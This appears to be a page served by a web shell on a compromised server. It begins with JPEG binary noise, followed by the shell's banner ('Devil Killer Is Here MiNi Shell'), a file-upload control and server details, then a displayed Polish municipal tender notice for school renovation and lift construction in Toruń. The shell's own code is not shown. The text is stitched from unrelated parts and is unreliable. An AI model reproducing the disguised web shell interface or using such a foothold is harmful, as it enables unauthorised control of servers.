JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210730/0013249701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00132497 z dnia 2021-07-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pracowni specjalistycznych oraz budowa wewnętrznej windy w budynku Zespołu Szkól Technicznych w Toruniu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Toruń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118856</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wały Gen. Sikorskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">j.majewski@um.torun.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.torun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pracowni specjalistycznych oraz budowa wewnętrznej windy w budynku Zespołu Szkól Technicznych w Toruniu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0c87ec91-edda-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00132497</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000805/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Twoja przyszłość w nowoczesnej szkole zawodowej 2 w ZST, w tym likwidacja barier architektonicznych w placówkach oświatowych. </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Twoja przyszłość w nowoczesnej szkole zawodowej 2 w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.umtorun.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umtorun.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu Platformy https://umtorun.ezamawiajacy.pl, oraz poczty elektronicznej.2. Zamawiający<br/>wyznacza następujące osoby do kontaktu z Wykonawcami: - w zakresie formalno-prawnym:<br/>PanJanusz Majewski e-mail: j.majewski@um.torun.pl - w zakresie merytorycznym: M.Kaczmarek e<br/>mail: m.kaczmarek@um.torun.pl Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do<br/>Systemu na stronie internetowej Urzędu Miasta Torunia: https://umtorun.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie<br/>przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości<br/>zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu<br/>rejestracyjnego: podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z<br/>obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla<br/>Wykonawców – Regulacje i procedury procesu zakupowego https://umtorun.ezamawiajacy.pl.4.<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>formatach: pdf., xls., doc., zip. Wykonawca może złożyć jednorazowo maks. 15 plików.5. Za datę<br/>przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>wczytania do Platformy https://umtorun.ezamawiajacy.pl.6. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy Zamawiający w zakładce "Pytania i odpowiedzi". Za datę<br/>przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do Systemu. 7. Dokumenty Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza<br/>również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej. 8. Złożenie oferty: Oferta wraz z<br/>załącznikami musi zostać sporządzona w języku polskim i złożona w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym pod rygorem<br/>nieważności 9. Szczegółowe informacje dot. wymagań technicznych i organizacyjnych zawarte są w<br/>pkt 16.1 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Zgodnie z art. 13 ust.1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: a) administratorem<br/>Pani/Pana danych osobowych jest Gmina Miasta Toruń, ul. Wały gen. Sikorskiego 8, 87-100 Toruń b)<br/>inspektorem ochrony danych osobowych zamawiającego jest Pan Marcin Kapiwąs, tel. 56 611 8802,<br/>email:<br/>iod@um.torun.pl;c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z niniejszego postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonym w trybie przetargu nieograniczonego; d) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 ustawy z dnia 11 września 20219 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz.<br/>2019 ze zm.), dalej„ustawa Pzp”;e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78<br/>ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy; f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): Informuję, że: 1.<br/>Posiada Pani/Pan:- na podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;- na podstawie art. 16 RODOprawo do sprostowania Pani/Pana danych osobowych;- na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;- prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczącychnarusza przepisy RODO;2. Nie przysługuje Pani/Panu:- związku z<br/>art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia<br/>danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. cRODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">51/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przebudowa pracowni specjalistycznych oraz budowa wewnętrznej windy w budynku Zespołu<br/>Szkól Technicznych w Toruniu’’.<br/>2. Przedmiot zamówienia obejmuje w szczególności następujący zakres prac:<br/>1) budowa wewnętrznej windy osobowej o napędzie elektrycznym, przystosowanej do przewozu<br/>osób niepełnosprawnych, zlokalizowanej w pobliżu wejścia głównego do szkoły; winda będzie<br/>obsługiwała 3 poziomy: parter, I i II piętro; konstrukcja szybu windowego w obrębie podszybia<br/>żelbetowa, a w pozostałej części murowana, wzmocniona trzpieniami,<br/>2) przebudowa pomieszczeń na I i II piętrze na cele pracowni specjalistycznych: logistycznej i<br/>teleinformatycznej; zakres prac obejmuje rozbiórki i postawienie nowych ścian działowych,<br/>demontaż boazerii, szpachlowanie i malowanie ścian i sufitów, nadproża stalowe, posadzki,<br/>montaż stolarki drzwiowej wewnętrznej, przewody wentylacji grawitacyjnej, instalację elektryczną<br/>oświetlenia i gniazd wtykowych, instalację komputerową oraz klimatyzację.<br/>3. Wykonawca zrealizuje przedmiot umowy w zakresie i w sposób określony w dokumentacji<br/>projektowej<br/>oraz specyfikacji technicznej wykonania i odbioru robót budowlanych (opracowania wykonane<br/>przez Piotra Świrzyńskiego, prowadzącego działalność gospodarczą pod firmą: „PSBUD Piotr<br/>Świrzyński”;<br/>części składowe dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót<br/>budowlanych wymienione w załączniku nr 1 do umowy) oraz zgodnie z obowiązującymi<br/>przepisami, normami, sztuką budowlaną, na podstawie oględzin terenu budowy oraz zgodnie z<br/>posiadanymi przez Zamawiającego decyzjami administracyjnymi.<br/>2. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>Podział zamówienia na części - Zamawiający nie przewiduje podziału zamówienia na części.<br/>Powody niedokonania podziału: realizacja zadania stanowi funkcjonalną całość i nie ma<br/>uzasadnienia dzielenia zadania na części.<br/>3.Oferty wariantowe<br/>Zamawiający nie dopuszcza możliwości składania ofert wariantowych.<br/>4. Katalogi elektroniczne.<br/>Zamawiający nie wymaga złożenia ofert w postaci katalogów elektronicznych.Termin wykonania<br/>zamówienia<br/>Termin realizacji zamówienia : rozpoczęcie realizacji z dniem podpisania umowy,<br/>- zakończenie całości realizacji 17 tygodni od zawarcia umowy<br/>-12 tygodni od podpisania umowy dla przebudowy sal I i II piętra.6. Wymagania w zakresie<br/>zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy.Zamawiający wymaga zatrudnienia na<br/>podstawie umowy o pracę przez Wykonawcę lub podwykonawcę, przez cały okres realizacji<br/>przedmiotu zamówienia, osób wykonujących wskazane poniżej czynności związane z robotami<br/>budowlanymi w trakcie realizacji przedmiotu zamówienia: czynności fizyczne i obsługa maszyn<br/>przy robotach ogólnobudowlanych związanych z przebudową budynku, robotach sanitarnych i<br/>robotach elektrycznych, których wykonywanie polega na wykonywaniu pracy w sposób<br/>określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (tekst jedn. Dz. U. z<br/>2019 r. poz. 1040).Szczegóły dotyczące wymagań zatrudnienia na podstawie stosunku pracy<br/>zawarte zostały we wzorze umowy, stanowiącym załącznik do SWZ.Wymagania dotyczące<br/>równoważności ofert zawiera pkt 6 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">119 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy<br/>Pzp.<br/>Zamawiający przewiduje udzielenie, w okresie 3 lat od dnia udzielenia zamówienia podstawowego,<br/>dotychczasowemu wykonawcy robót budowlanych, zamówienia polegającego na powtórzeniu<br/>podobnych robót budowlanych, zamówienie jest przewidziane w ogłoszeniu o zamówieniu dla<br/>zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia<br/>została uwzględniona przy obliczaniu jego wartości; Zamawiający przewiduje udzielenie, zamówienia<br/>polegającego na powtórzeniu podobnych robót budowlanych tj budowy wewnętrznej windy osobowej o<br/>napędzie elektrycznym, przystosowanej do przewozu osób niepełnosprawnych; konstrukcji szybu<br/>windowego w obrębie podszybia żelbetowego, a w pozostałej części murowanego, wzmocnionego<br/>trzpieniami, przebudowy pomieszczeń na I i II piętrze na cele pracowni specjalistycznych- rozbiórki i<br/>postawienie nowych ścian działowych, demontaż boazerii, szpachlowanie i malowanie ścian i sufitów,<br/>nadproża stalowe, posadzki, montaż stolarki drzwiowej wewnętrznej, przewody wentylacji<br/>grawitacyjnej, instalację elektryczną oświetlenia i gniazd wtykowych, instalację komputerową oraz<br/>klimatyzację, itp.).w lokalizacji wymienionej w pkt 1. SWZ. Możliwe jednokrotne udzielenia zamówienia<br/>podobnego. Termin wykonania zamówienia i cena zostaną ustalone w drodze negocjacji, z tym że<br/>termin wykonania nie może być dłuższy niż 4 miesiące od dnia podpisania umowy w sprawie<br/>udzielenia zamówienia powtórzonego, a cena nie może przekroczyć 101.626,02 zł netto. Uzgodnienie<br/>ceny odbywać się będzie na zasadach określonych w § 8 ust.16 wzoru umowy stanowiącego załącznik<br/>do SIWZ. Udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych jest<br/>jednostronną, uznaniową decyzją Zamawiającego i jest zależne od ograniczeń budżetowych oraz<br/>zadowolenia z jakości robót budowlanych wykonanych w ramach zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi w miesiącach – nie krócej niż 60 miesięcy i nie dłużej niż 72 miesiące Zamawiający ustala maksymalny okres rękojmi na 72 miesiące.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w<br/>postępowaniu dotyczące:1) zdolności do występowania w obrocie gospodarczym – zamawiający<br/>nie stawia szczegółowego warunku w tym zakresie 2) uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – nie dotyczy<br/>3) sytuacji ekonomicznej lub finansowej - zamawiający nie stawia szczegółowego warunku w<br/>tym zakresie4) zdolności technicznej lub zawodowej: a) Wykonawca spełni ten warunek jeżeli<br/>wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonali co najmniej 2 roboty budowlane<br/>dowolnego rodzaju o wartości min 100.000,00zł brutto każda . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania, wskazanych w art. 108 ust. 1<br/>ustawy – załącznik nr 4</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty -<br/>wypełniony załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Do oferty wykonawca załącza również: a) pełnomocnictwo - gdy umocowanie osoby składającej<br/>ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania<br/>umowy. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności<br/>wskazanie:- postępowania o zamówienie publiczne, którego dotyczy,- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,- ustanowionego pełnomocnika oraz zakresu jego umocowania.b) oświadczenie<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile dotyczy)- Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek<br/>dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni wykonawcy,c) zobowiązanie podmiotu trzeciego (o ile<br/>dotyczy)Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek<br/>dowodowy potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby<br/>gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:- zakres<br/>dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;- sposób i okres<br/>udostępnienia 